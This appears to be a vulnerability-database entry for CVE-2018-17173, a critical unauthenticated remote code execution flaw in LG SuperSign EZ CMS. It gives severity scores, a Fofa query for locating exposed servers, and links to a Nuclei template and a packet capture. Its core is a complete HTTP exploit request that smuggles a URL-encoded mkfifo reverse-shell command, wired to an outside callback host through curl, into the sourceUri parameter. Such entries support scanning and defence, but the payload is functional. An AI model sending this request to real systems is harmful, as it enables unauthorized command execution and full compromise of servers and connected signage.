| Title | LG Supersign EZ CMS - Remote Code Execution |
|---|---|
| Author | pussycat0x |
| Severity | Critical |
| Impact | Unauthenticated attackers can execute arbitrary system commands on LG SuperSign CMS servers via the sourceUri parameter, leading to complete server compromise and potential access to connected digital signage systems. |
| Remediation | Upgrade to a patched version of LG SuperSign CMS that addresses CVE-2018-17173. |
| CVSS Score | 9.8 |
| EPSS Score | 0.76568 |
| CVE ID | CVE-2018-17173 |
| CWE ID | CWE-94 |
| Fofa Query | title="LG SuperSign" |
| Tags | cve cve2018 lg supersign-cms rce vkev vuln |
LG SuperSign CMS allows remote attackers to execute arbitrary code via the sourceUri parameter to qsr_server/device/getThumbnail.
GET /qsr_server/device/getThumbnail?sourceUri=\'%2b-%253brm%2b/tmp/f%253bmkfifo%2b/tmp/f%253bcat%2b/tmp/f|/bin/sh%2b-i%2b2>%25261|curl%2bhttp%253a//d5jptu9le0o4701p4hvgpdzzzmjgpbr5u.oast.online%2b>/tmp/f%253b\';&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-17173.yaml
🦈 Packet Capture: ⬇️ Download cve-2018-17173.pcap
N/AN/A